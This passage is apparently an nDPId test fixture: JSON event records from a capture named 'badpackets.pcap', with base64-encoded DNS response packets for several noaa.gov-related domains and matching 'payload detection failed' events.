01913{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1228,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs98gADgR3UqMWiHtzLpQ5QA1U+IKco350KyEEAABAAMABAANB2VkZ2UtcDEBbARub2FhA2dvdgAAHAABwAwAHAABAAAAHgAQJhAAIIgAjAAAAAAAAAAAJMAMABwAAQAAAB4AECYQACCAAIwBAAAAAAAAACTADAAuAAEAAAAeAR4AHAUEAAAAHlkr8xJZIriS1gsBbARub2FhA2dvdgCV6O\/WR3JCSK+C7cZBu3S3X5K0UHxpncAfxFmSgHubPtuQ+ppFRTp+1fHbrUOyCpixD7BN4GSPyT84LF8EMzJbQxH0r2LLAvgtvgpUbYL7Z7w18yYTnE6XGfHtthXb1ZOye1L2hiRfpzbmmXCHOKb6LEYuPXKYSPhX2n+ImdcFypwUqYfMSD9FcjNa3Jo3Oqro2WuMMbD2gPnRfJ8TdXYRG4VNmibFauhfDGpn9UeUfORtwE7m2jOvlQ6Qvy9OpZkqoNE2Vdtt7jPJm2tzt5OKxSjI1XLv3boeUU7hE7UYEXONrZssQLYvDrWx9GDK\/I6MmaWyMYZAJODqzmpC6mevwHoAAgABAAFRgAAHBG5zLWXAfMB6AAIAAQABUYAACAVucy1td8B8wHoAAgABAAFRgAAIBW5zLW53wHzAegAuAAEAAVGAAR4AAgUDAAFRgFkr8xJZIriS1gsBbARub2FhA2dvdgAeLq4NmnVkcNxQ2ECZHAEvCMi5MZYEL8edA7YVxsb2UBGFIEGs\/0MCPjY5njGkf1suVTZtcwyT75u2gFjZgWxP1+c7rm4cmvpvBe+wC0vSebZWwrbWCerbFqwFr8WbzPO2CxG0Zn8pbBKC9uM1kn0tU08OZWkEPnxTJXMcLAZSYKzHnM3Abd9+nCKn5iCnhESUxIPjqzi3TtF47AxxSw8oSy\/22YcIyG5RxzRRDhaTIGZj9gjcsM8kyra2eumMo4lRPXVhwaJ6DQF2GVKV8FslkU9\/qAyzckJZU+4ClRBUn7ZyYZlZnrFBAgj7Zmr2QS9x22hcQerFh+735VmloZaXwZIAAQABAAFRgAAEjFoh7cGSABwAAQABUYAAECYQACCAAIwAAAAAAAAAAjfBpQABAAEAAVGAAASMrBHtwaUAHAABAAFRgAAQJhAAIIgAjAAAAAAAAAACN8G5AAEAAQABUYAABKE3IALBuQAcAAEAAVGAABAmEAAgjACMAAAAAAAAAAACwZIALgABAAFRgAEcAAEFAwABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AB08bt6E7ohbhYgi6U5fzCvPQTfSQRo3ylVGQBd4GQioTMMd+BhUrSx1nl58nNI6c+qAd1CqFmFqiM5ebi5pE1XQEztOcBoUZF5qERb6hyUOPUUPqQUzb4737GY7eLMVhWgV+nXDO9WAuWyFdvNYRSLJ60ie\/UEooUgR4nksvbeWExpReSwiYozRFhByWMQyA9TM2vrVynTVyVh25EIUMETyShl\/dY6oBT5c+IZn43u+z67SmlCfIeXgKTB\/oGjV7DRb81d5wfupBlV79lVlV1T1yN18zBWvAih22KxRneyyeH+TxQe9uSQgcU0OCnhDrgRNFl1ahPVaCtbmKAeDwCvBkgAuAAEAAVGAAQ=="}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":30,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1194,"global_ts_msec":1495451309206} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":30,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1194,"global_ts_msec":1495451309206}
00764{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":31,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":361,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":361,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW2UgADURSHOMrBHtzLpQ5QA1ufwM17VSuDGEEAABAAYABAANA21hZwRuY2VwBG5vYWEDZ292AAABAAHADAAFAAEAAAEsAAsDbWFnBGNwcmvAEMAMAC4AAQAAASwBIQAFBQQAAAEsWSuLaVkiUOlQZARuY2VwBG5vYWEDZ292ADcGQyBFP4D+oljdb2+uDa9\/19GSwvR6WriPq+5z0bu\/0ZaU\/D8IQsmXY34oOVHWkzG6MucH8ZmcfTOJDErUlSNSiRzFT51PBmw6nGKnxTSwXkETkX04Oo9QP2yzVDt5BovyB6C9tXHehSkdYBFKv3dkwzGxANJxhe+yFBxgwF9UCs8+cZEJOlz8tn056cIu0n8cLm0Luw3FG\/hQGfvItzUlOxBl1A60sdiGmy6QUdNCXAcNU0yZ9pOPKxcCxUBH4IhMSpEnUlvPR6QJH5nmfUQe2XEJKZYxCw=="} 00750{"packet_event_id":1,"packet_event_name":"packet","packet_id":31,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":361,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":361,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW2UgADURSHOMrBHtzLpQ5QA1ufwM17VSuDGEEAABAAYABAANA21hZwRuY2VwBG5vYWEDZ292AAABAAHADAAFAAEAAAEsAAsDbWFnBGNwcmvAEMAMAC4AAQAAASwBIQAFBQQAAAEsWSuLaVkiUOlQZARuY2VwBG5vYWEDZ292ADcGQyBFP4D+oljdb2+uDa9\/19GSwvR6WriPq+5z0bu\/0ZaU\/D8IQsmXY34oOVHWkzG6MucH8ZmcfTOJDErUlSNSiRzFT51PBmw6nGKnxTSwXkETkX04Oo9QP2yzVDt5BovyB6C9tXHehSkdYBFKv3dkwzGxANJxhe+yFBxgwF9UCs8+cZEJOlz8tn056cIu0n8cLm0Luw3FG\/hQGfvItzUlOxBl1A60sdiGmy6QUdNCXAcNU0yZ9pOPKxcCxUBH4IhMSpEnUlvPR6QJH5nmfUQe2XEJKZYxCw=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":31,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":327,"global_ts_msec":1495451309834} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":31,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":327,"global_ts_msec":1495451309834}
01878{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":32,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1191,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW2YgADURSHKMrBHtzLpQ5QA1igkKTYrrwr6EEAABAAIABAANA3d3dwx0c3VuYW1pcmVhZHkEbm9hYQNnb3YAAAEAAcAMAAEAAQAAASwABIxaccjADAAuAAEAAAEsARwAAQUEAAABLFkri31ZIlD9PnMEbm9hYQNnb3YAYj6eILo+qkq5k18ERYBx0xRM9\/G7L0FZIt4YRMfTu\/USwfAnYN75io2kNkONiogWmMZ4Lag7k3IYxgcesHSZm7PZPDgrUXlAcd3yvVMKVKTxcZWm4erxNJExiN8+R7+gO8BV6r5YHq7uAPRDiCQOsXNlXUlDbrs1lqRHqt+\/of11uAQ6meqXGXmKksSlBj5fbAkW1+8cB\/QSQlJjzyciYH5OpnBXSP0xkvRyxYbMOP3yK39llO\/1t56mjX6N00VukVX1CCuCNDvCVEnhc9yhfw9oDlronPvyL2kVGsfMWn8txFzsS3wqbAr7fJQNwFsN6v7JS37aCBEsfLcqNMdRvcBZAAIAAQABUYAACAVucy1td8BZwFkAAgABAAFRgAAIBW5zLW53wFnAWQACAAEAAVGAAAcEbnMtZcBZwFkALgABAAFRgAEcAAIFAgABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AH\/\/EM5XxGUAJzS0k3FL5gqwtJA4FBuTo0uxBkbdgNOM7eIqyHshwuqLDq45ztJouzzqb5\/+QwdCyRboRA6YQcMyduo30hAwZBPjCwFtGtCbCO0zddpUh\/DZBFgSPh2dFJqb9c9JuhHoz3+E4Y9URJn+5DpaoXNsnl89Rx6siUb+Rihm7C+Vk315amYja69lUQmg3PNcdUVXF76DLNDZ9f0J\/NtTrjCtrMqxXjzjQDEOf1LyNKCNPvCsDV8BtRjU3VnXwwNw9fAKyA0zjlIJMDcZHgtkbmrTB9mFGy8tMxbqfFpB+6mG8tYtHiQWLDq6x9iFxvHJ7caHhZ1nCy6pTLXBlwABAAEAAVGAAASMWiHtwZcAHAABAAFRgAAQJhAAIIAAjAAAAAAAAAACN8FvAAEAAQABUYAABIysEe3BbwAcAAEAAVGAABAmEAAgiACMAAAAAAAAAAI3wYMAAQABAAFRgAAEoTcgAsGDABwAAQABUYAAECYQACCMAIwAAAAAAAAAAALBlwAuAAEAAVGAARwAAQUDAAFRgFkri31ZIlD9PnMEbm9hYQNnb3YAHTxu3oTuiFuFiCLpTl\/MK89BN9JBGjfKVUZAF3gZCKhMwx34GFStLHWeXnyc0jpz6oB3UKoWYWqIzl5uLmkTVdATO05wGhRkXmoRFvqHJQ49RQ+pBTNvjvfsZjt4sxWFaBX6dcM71YC5bIV281hFIsnrSJ79QSihSBHieSy9t5YTGlF5LCJijNEWEHJYxDID1Mza+tXKdNXJWHbkQhQwRPJKGX91jqgFPlz4hmfje77PrtKaUJ8h5eApMH+gaNXsNFvzV3nB+6kGVXv2VWVXVPXI3XzMFa8CKHbYrFGd7LJ4f5PFB725JCBxTQ4KeEOuBE0WXVqE9VoK1uYoB4PAK8GXAC4AAQABUYAB"} 01864{"packet_event_id":1,"packet_event_name":"packet","packet_id":32,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1191,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW2YgADURSHKMrBHtzLpQ5QA1igkKTYrrwr6EEAABAAIABAANA3d3dwx0c3VuYW1pcmVhZHkEbm9hYQNnb3YAAAEAAcAMAAEAAQAAASwABIxaccjADAAuAAEAAAEsARwAAQUEAAABLFkri31ZIlD9PnMEbm9hYQNnb3YAYj6eILo+qkq5k18ERYBx0xRM9\/G7L0FZIt4YRMfTu\/USwfAnYN75io2kNkONiogWmMZ4Lag7k3IYxgcesHSZm7PZPDgrUXlAcd3yvVMKVKTxcZWm4erxNJExiN8+R7+gO8BV6r5YHq7uAPRDiCQOsXNlXUlDbrs1lqRHqt+\/of11uAQ6meqXGXmKksSlBj5fbAkW1+8cB\/QSQlJjzyciYH5OpnBXSP0xkvRyxYbMOP3yK39llO\/1t56mjX6N00VukVX1CCuCNDvCVEnhc9yhfw9oDlronPvyL2kVGsfMWn8txFzsS3wqbAr7fJQNwFsN6v7JS37aCBEsfLcqNMdRvcBZAAIAAQABUYAACAVucy1td8BZwFkAAgABAAFRgAAIBW5zLW53wFnAWQACAAEAAVGAAAcEbnMtZcBZwFkALgABAAFRgAEcAAIFAgABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AH\/\/EM5XxGUAJzS0k3FL5gqwtJA4FBuTo0uxBkbdgNOM7eIqyHshwuqLDq45ztJouzzqb5\/+QwdCyRboRA6YQcMyduo30hAwZBPjCwFtGtCbCO0zddpUh\/DZBFgSPh2dFJqb9c9JuhHoz3+E4Y9URJn+5DpaoXNsnl89Rx6siUb+Rihm7C+Vk315amYja69lUQmg3PNcdUVXF76DLNDZ9f0J\/NtTrjCtrMqxXjzjQDEOf1LyNKCNPvCsDV8BtRjU3VnXwwNw9fAKyA0zjlIJMDcZHgtkbmrTB9mFGy8tMxbqfFpB+6mG8tYtHiQWLDq6x9iFxvHJ7caHhZ1nCy6pTLXBlwABAAEAAVGAAASMWiHtwZcAHAABAAFRgAAQJhAAIIAAjAAAAAAAAAACN8FvAAEAAQABUYAABIysEe3BbwAcAAEAAVGAABAmEAAgiACMAAAAAAAAAAI3wYMAAQABAAFRgAAEoTcgAsGDABwAAQABUYAAECYQACCMAIwAAAAAAAAAAALBlwAuAAEAAVGAARwAAQUDAAFRgFkri31ZIlD9PnMEbm9hYQNnb3YAHTxu3oTuiFuFiCLpTl\/MK89BN9JBGjfKVUZAF3gZCKhMwx34GFStLHWeXnyc0jpz6oB3UKoWYWqIzl5uLmkTVdATO05wGhRkXmoRFvqHJQ49RQ+pBTNvjvfsZjt4sxWFaBX6dcM71YC5bIV281hFIsnrSJ79QSihSBHieSy9t5YTGlF5LCJijNEWEHJYxDID1Mza+tXKdNXJWHbkQhQwRPJKGX91jqgFPlz4hmfje77PrtKaUJ8h5eApMH+gaNXsNFvzV3nB+6kGVXv2VWVXVPXI3XzMFa8CKHbYrFGd7LJ4f5PFB725JCBxTQ4KeEOuBE0WXVqE9VoK1uYoB4PAK8GXAC4AAQABUYAB"}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":32,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1157,"global_ts_msec":1495451309971} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":32,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1157,"global_ts_msec":1495451309971}
01929{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":33,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1228,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs+EgADgR3UiMWiHtzLpQ5QA1YrcKcmZcnv2EEAABAAMABAANB2Ryb3VnaHQDZ292AAAcAAHADAAcAAEAAA4QABAmEAAggEAAAgAAAAAAAAFxwAwAHAABAAAOEAAQJhAAIIBAAAIAAAAAAAABcsAMAC4AAQAADhABHwAcBQIAAA4QWSuLOFkiULjwAAdkcm91Z2h0A2dvdgCiFhT73R8JkfGDTfZ4di36jz5eyOGbPz32qAMnwn4nlyVmuvzkf4NiJ96OxTP54IIqeClIfVaS9wEAfT+47pslkKZCPVwuhmOe6fDooq+GLDJv0+Ghc9188DOEwVA6ulHxE25woNOlZB13Uz3i90Fc0vOaXvfF9ZGxFm4J9mw3dWtYg4\/ds36+RRrCA9x3ERJDt7HPku5qZtP0xKuN8yDtutEHNQ+PFq\/yqbVvE6s5DpPsYgJR0mKl+kuenRHwsn7+W8RejJkXBdU0ylZRMFbsC3fBOassmaNP6p110AEWGpszbswU0n7MR6eCsSeyRW3u+kxNbB3DHriPINnb\/25ywHMAAgABAAAOEAANBW5zLW53BG5vYWHAe8BzAAIAAQAADhAACAVucy1td8GSwHMAAgABAAAOEAAHBG5zLWXBksBzAC4AAQAADhABHwACBQIAAA4QWSuLOFkiULjwAAdkcm91Z2h0A2dvdgAXXbMkYPS9QUln5hjQ9vMJUQmj7EOZmvYJzaa79X6dsVN8FpugM8E25umwpE\/dq29ve8D++P2tnJQfbDgKbTCzWcNRmJZVue8tdC5OTorh1HBmQkpoumFnTbmtekcohQkMcnb3AmWMR742fJ5XNYHgW7Ap4AaJ+wubZ2DGMzIxl72\/ofg+1dcqnAgbyQV8y0ogjIlloPBWpcRwxyL+zdk7S+iyN6s+YgfobuDo5dbvDWNky63CGBbyLqEaC7wzznplPJLXci32DUon7xJA0oUr7x\/h5U6kgccx3MbgKjnlj1l0PwM\/R2IbRlpN9BAQ34xrrixU4+6ApBRbB3spHijNwbkAAQABAAFRgAAEjFoh7cG5ABwAAQABUYAAECYQACCAAIwAAAAAAAAAAjfBpQABAAEAAVGAAASMrBHtwaUAHAABAAFRgAAQJhAAIIgAjAAAAAAAAAACN8GMAAEAAQABUYAABKE3IALBjAAcAAEAAVGAABAmEAAgjACMAAAAAAAAAAACwbkALgABAAFRgAEcAAEFAwABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AB08bt6E7ohbhYgi6U5fzCvPQTfSQRo3ylVGQBd4GQioTMMd+BhUrSx1nl58nNI6c+qAd1CqFmFqiM5ebi5pE1XQEztOcBoUZF5qERb6hyUOPUUPqQUzb4737GY7eLMVhWgV+nXDO9WAuWyFdvNYRSLJ60ie\/UEooUgR4nksvbeWExpReSwiYozRFhByWMQyA9TM2vrVynTVyVh25EIUMETyShl\/dY6oBT5c+IZn43u+z67SmlCfIeXgKTB\/oGjV7DRb81d5wfupBlV79lVlV1T1yN18zBWvAih22KxRneyyeH+TxQe9uSQgcU0OCnhDrgRNFl1ahPVaCtbmKAeDwCvBuQAuAAEAAVGAAQ=="} 01915{"packet_event_id":1,"packet_event_name":"packet","packet_id":33,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1228,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs+EgADgR3UiMWiHtzLpQ5QA1YrcKcmZcnv2EEAABAAMABAANB2Ryb3VnaHQDZ292AAAcAAHADAAcAAEAAA4QABAmEAAggEAAAgAAAAAAAAFxwAwAHAABAAAOEAAQJhAAIIBAAAIAAAAAAAABcsAMAC4AAQAADhABHwAcBQIAAA4QWSuLOFkiULjwAAdkcm91Z2h0A2dvdgCiFhT73R8JkfGDTfZ4di36jz5eyOGbPz32qAMnwn4nlyVmuvzkf4NiJ96OxTP54IIqeClIfVaS9wEAfT+47pslkKZCPVwuhmOe6fDooq+GLDJv0+Ghc9188DOEwVA6ulHxE25woNOlZB13Uz3i90Fc0vOaXvfF9ZGxFm4J9mw3dWtYg4\/ds36+RRrCA9x3ERJDt7HPku5qZtP0xKuN8yDtutEHNQ+PFq\/yqbVvE6s5DpPsYgJR0mKl+kuenRHwsn7+W8RejJkXBdU0ylZRMFbsC3fBOassmaNP6p110AEWGpszbswU0n7MR6eCsSeyRW3u+kxNbB3DHriPINnb\/25ywHMAAgABAAAOEAANBW5zLW53BG5vYWHAe8BzAAIAAQAADhAACAVucy1td8GSwHMAAgABAAAOEAAHBG5zLWXBksBzAC4AAQAADhABHwACBQIAAA4QWSuLOFkiULjwAAdkcm91Z2h0A2dvdgAXXbMkYPS9QUln5hjQ9vMJUQmj7EOZmvYJzaa79X6dsVN8FpugM8E25umwpE\/dq29ve8D++P2tnJQfbDgKbTCzWcNRmJZVue8tdC5OTorh1HBmQkpoumFnTbmtekcohQkMcnb3AmWMR742fJ5XNYHgW7Ap4AaJ+wubZ2DGMzIxl72\/ofg+1dcqnAgbyQV8y0ogjIlloPBWpcRwxyL+zdk7S+iyN6s+YgfobuDo5dbvDWNky63CGBbyLqEaC7wzznplPJLXci32DUon7xJA0oUr7x\/h5U6kgccx3MbgKjnlj1l0PwM\/R2IbRlpN9BAQ34xrrixU4+6ApBRbB3spHijNwbkAAQABAAFRgAAEjFoh7cG5ABwAAQABUYAAECYQACCAAIwAAAAAAAAAAjfBpQABAAEAAVGAAASMrBHtwaUAHAABAAFRgAAQJhAAIIgAjAAAAAAAAAACN8GMAAEAAQABUYAABKE3IALBjAAcAAEAAVGAABAmEAAgjACMAAAAAAAAAAACwbkALgABAAFRgAEcAAEFAwABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AB08bt6E7ohbhYgi6U5fzCvPQTfSQRo3ylVGQBd4GQioTMMd+BhUrSx1nl58nNI6c+qAd1CqFmFqiM5ebi5pE1XQEztOcBoUZF5qERb6hyUOPUUPqQUzb4737GY7eLMVhWgV+nXDO9WAuWyFdvNYRSLJ60ie\/UEooUgR4nksvbeWExpReSwiYozRFhByWMQyA9TM2vrVynTVyVh25EIUMETyShl\/dY6oBT5c+IZn43u+z67SmlCfIeXgKTB\/oGjV7DRb81d5wfupBlV79lVlV1T1yN18zBWvAih22KxRneyyeH+TxQe9uSQgcU0OCnhDrgRNFl1ahPVaCtbmKAeDwCvBuQAuAAEAAVGAAQ=="}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":33,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1194,"global_ts_msec":1495451310199} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":33,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1194,"global_ts_msec":1495451310199}
01887{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":34,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1192,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs+IgADgR3UeMWiHtzLpQ5QA1+8YKTsy4mcCEEAABAAIABAANA3d3dwd0c3VuYW1pA2dvdgAAAQABwAwAAQABAAAOEAAEjFplPMAMAC4AAQAADhABHwABBQMAAA4QWSnFrFkgiyw3Ggd0c3VuYW1pA2dvdgAJEO7XiuA+vhpIYobOdRe1yI2VB\/j2mzi\/2yP1Lp9H4M5qjusV7CkPVxOQC0AaCcVxqT4M6bztlrT7qUL0A1w3xQdNOpdYK4DVjBCuxhfx\/pX\/Rq0kECnDSkfE1jj7zqbQ61fish6MQQophJFU+Am6c5wLoF1vAyR8qdln5pLZ1FEOPVwHhvgDFyv98HmMD00pw\/wVmA65j4meeVRLeQ3a837VsRiT4jJKffufwtmx5Eqpxa2\/kJw53hWYnnMS38GIEaZRlEQM2vGca6sB3+N+kJQ1oGEgcMiONiOotB9a5cfHgsVEbIgj1jFGWNkedySgudQrRBslLuL9OimDWkL2wE8AAgABAAFRgAAMBG5zLWUEbm9hYcBXwE8AAgABAAFRgAAIBW5zLW53wW3ATwACAAEAAVGAAAgFbnMtbXfBbcBPAC4AAQABUYABHwACBQIAAVGAWSnFrFkgiyw3Ggd0c3VuYW1pA2dvdgAtNAttZ2tlqpXEcOn7mcA\/Z0HMna2P7rrtJXnupFJ5uos8L3b6TswIuV1nZPJ\/S0K4ZvjUZJukTJ5dsR\/z2bbQiS1uixECpVlyZZOXhp3A0rmQKUIYpz+yrwlZ4Dcq1wOupPxo1PMQl4AwQrMNxeyrQ0QU9G49JKGe20YA1Lhz1N+J4QbO5Tu3vWoPjnfsCEURngIIHow6qjNrrZEhlA929gSEpDzFDBqOvEXIedVxUEt\/nMPYmTYEM5I+66eeFT9HrjHCjzLWlP00hbu089PduHD\/KIRGO7Fs2DNO2Yt\/9FqjLrVhvcG5ptrnTz9lTYR\/uQVtLKTsydCWVZF9YLTOwWgAAQABAAFRgAAEjFoh7cFoABwAAQABUYAAECYQACCAAIwAAAAAAAAAAjfBlAABAAEAAVGAAASMrBHtwZQAHAABAAFRgAAQJhAAIIgAjAAAAAAAAAACN8GAAAEAAQABUYAABKE3IALBgAAcAAEAAVGAABAmEAAgjACMAAAAAAAAAAACwWgALgABAAFRgAEcAAEFAwABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AB08bt6E7ohbhYgi6U5fzCvPQTfSQRo3ylVGQBd4GQioTMMd+BhUrSx1nl58nNI6c+qAd1CqFmFqiM5ebi5pE1XQEztOcBoUZF5qERb6hyUOPUUPqQUzb4737GY7eLMVhWgV+nXDO9WAuWyFdvNYRSLJ60ie\/UEooUgR4nksvbeWExpReSwiYozRFhByWMQyA9TM2vrVynTVyVh25EIUMETyShl\/dY6oBT5c+IZn43u+z67SmlCfIeXgKTB\/oGjV7DRb81d5wfupBlV79lVlV1T1yN18zBWvAih22KxRneyyeH+TxQe9uSQgcU0OCnhDrgRNFl1ahPVaCtbmKAeDwCvBaAAuAAEAAVGAAQ=="} 01873{"packet_event_id":1,"packet_event_name":"packet","packet_id":34,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1192,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs+IgADgR3UeMWiHtzLpQ5QA1+8YKTsy4mcCEEAABAAIABAANA3d3dwd0c3VuYW1pA2dvdgAAAQABwAwAAQABAAAOEAAEjFplPMAMAC4AAQAADhABHwABBQMAAA4QWSnFrFkgiyw3Ggd0c3VuYW1pA2dvdgAJEO7XiuA+vhpIYobOdRe1yI2VB\/j2mzi\/2yP1Lp9H4M5qjusV7CkPVxOQC0AaCcVxqT4M6bztlrT7qUL0A1w3xQdNOpdYK4DVjBCuxhfx\/pX\/Rq0kECnDSkfE1jj7zqbQ61fish6MQQophJFU+Am6c5wLoF1vAyR8qdln5pLZ1FEOPVwHhvgDFyv98HmMD00pw\/wVmA65j4meeVRLeQ3a837VsRiT4jJKffufwtmx5Eqpxa2\/kJw53hWYnnMS38GIEaZRlEQM2vGca6sB3+N+kJQ1oGEgcMiONiOotB9a5cfHgsVEbIgj1jFGWNkedySgudQrRBslLuL9OimDWkL2wE8AAgABAAFRgAAMBG5zLWUEbm9hYcBXwE8AAgABAAFRgAAIBW5zLW53wW3ATwACAAEAAVGAAAgFbnMtbXfBbcBPAC4AAQABUYABHwACBQIAAVGAWSnFrFkgiyw3Ggd0c3VuYW1pA2dvdgAtNAttZ2tlqpXEcOn7mcA\/Z0HMna2P7rrtJXnupFJ5uos8L3b6TswIuV1nZPJ\/S0K4ZvjUZJukTJ5dsR\/z2bbQiS1uixECpVlyZZOXhp3A0rmQKUIYpz+yrwlZ4Dcq1wOupPxo1PMQl4AwQrMNxeyrQ0QU9G49JKGe20YA1Lhz1N+J4QbO5Tu3vWoPjnfsCEURngIIHow6qjNrrZEhlA929gSEpDzFDBqOvEXIedVxUEt\/nMPYmTYEM5I+66eeFT9HrjHCjzLWlP00hbu089PduHD\/KIRGO7Fs2DNO2Yt\/9FqjLrVhvcG5ptrnTz9lTYR\/uQVtLKTsydCWVZF9YLTOwWgAAQABAAFRgAAEjFoh7cFoABwAAQABUYAAECYQACCAAIwAAAAAAAAAAjfBlAABAAEAAVGAAASMrBHtwZQAHAABAAFRgAAQJhAAIIgAjAAAAAAAAAACN8GAAAEAAQABUYAABKE3IALBgAAcAAEAAVGAABAmEAAgjACMAAAAAAAAAAACwWgALgABAAFRgAEcAAEFAwABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AB08bt6E7ohbhYgi6U5fzCvPQTfSQRo3ylVGQBd4GQioTMMd+BhUrSx1nl58nNI6c+qAd1CqFmFqiM5ebi5pE1XQEztOcBoUZF5qERb6hyUOPUUPqQUzb4737GY7eLMVhWgV+nXDO9WAuWyFdvNYRSLJ60ie\/UEooUgR4nksvbeWExpReSwiYozRFhByWMQyA9TM2vrVynTVyVh25EIUMETyShl\/dY6oBT5c+IZn43u+z67SmlCfIeXgKTB\/oGjV7DRb81d5wfupBlV79lVlV1T1yN18zBWvAih22KxRneyyeH+TxQe9uSQgcU0OCnhDrgRNFl1ahPVaCtbmKAeDwCvBaAAuAAEAAVGAAQ=="}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":34,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1158,"global_ts_msec":1495451311326} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":34,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1158,"global_ts_msec":1495451311326}
01873{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":35,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1191,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW2cgADURSHGMrBHtzLpQ5QA1l38KTYdoHVOEEAABAAIABAANA3d3dwZub2hyc2MBbARub2FhA2dvdgAAAQABwAwAAQABAAAAHgAEwC5sA8AMAC4AAQAAAB4BHgABBQUAAAAeWSvzElkiuJLWCwFsBG5vYWEDZ292AEmbFbdVf7FrZdNM0IbcWdEpLfLseHOhwkbd9Xyz04fYyQrhx+Jovb0Em+GuaroqiO5SKtEQJqVCCZB9p842uoKxho+pPpdJyWiQc7GnXhWdDNWtJHOkPmoq3wrf3jfnkFfPCy15tQqxwItlfzeoXa47K\/rbLzji9J6Cj82yysecO7bElXtCuXkKPdBLHf390b9a43nJCO8borqU1G0mIjq1zfMZZF6Kibws4+mFg0EdoxSpF65NctKwuurIJVArvCE11J8PbHegAuvbVEpvXwtS4p8hvMfMnJvNSqKpfuQhDV7nHNaRPD8uISM\/x8CbB8jQLQpUussqmlC6PtCbdXfAVQACAAEAAVGAAAgFbnMtbnfAV8BVAAIAAQABUYAACAVucy1td8BXwFUAAgABAAFRgAAHBG5zLWXAV8BVAC4AAQABUYABHgACBQMAAVGAWSvzElkiuJLWCwFsBG5vYWEDZ292AB4urg2adWRw3FDYQJkcAS8IyLkxlgQvx50DthXGxvZQEYUgQaz\/QwI+NjmeMaR\/Wy5VNm1zDJPvm7aAWNmBbE\/X